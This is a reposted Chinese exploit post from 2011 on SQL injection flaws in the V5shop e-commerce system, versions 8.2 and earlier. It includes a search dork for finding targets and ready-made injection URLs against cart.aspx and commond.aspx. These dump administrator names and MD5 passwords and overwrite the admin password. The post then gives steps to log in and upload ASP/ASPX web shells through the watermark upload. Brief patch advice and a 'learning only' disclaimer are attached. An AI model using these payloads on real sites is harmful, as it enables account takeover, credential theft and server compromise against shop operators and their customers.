V5shop 8.2版本下通杀注入漏洞

2011-8-23 9:37:02 来源:网络转载 浏览:51
V5shop 8.2版本下通杀注入漏洞

漏洞危害:高危
一、漏洞文件:cart.aspx

搜索关键词:inurl:scoreindex.aspx

exp :

/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --


然后针对爆出来的md5密码进行在线解密,如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。(当然很多时候md5解密是没有结果的)此时需要先更新下管理员密码:

update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

其中pass串先将密码转成32位,再转换成大写,再转换成sql16进制(上面串默认密码是v5shop)

完整语句为:

cart.aspx?act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
)>0 --

 如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。

 进入后台后在系统设置-参数设置-后台上传水印,水印上传那儿貌似可以上传任意文件(可以先上传asp大马,然后再上传aspx大马)。

小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。

修复方法:升级最新8.3版,或者临时把cart.aspx改名或做其它方法处理。

二、漏洞文件:commond.aspx

exp:

/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)
上面这个可以直接显示出管理员用户名

/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)
上面这个可以显示MD5密码

/commond.aspx?id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

上面这个用于更改管理员密码

如果顺利,管理员密码已经被更改成你指定的密码(此处默认为v5shop),然后就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。

拿shell方法:(未验证)
系统设置->参数设置->后台上传水印.
先传ASP的马..再传ASPX马.
上传后路径:/uploadFile/Picture/*.asp

小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。

修复方法:升级最新8.3版,或者临时把commond.aspx改名或做其它方法处理。

提示:使用系统者可以及时升级,阅读此文者请大家仅用于学习,勿用于非法用途。

cart.aspx?act=buy&id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100--

(0)
(0)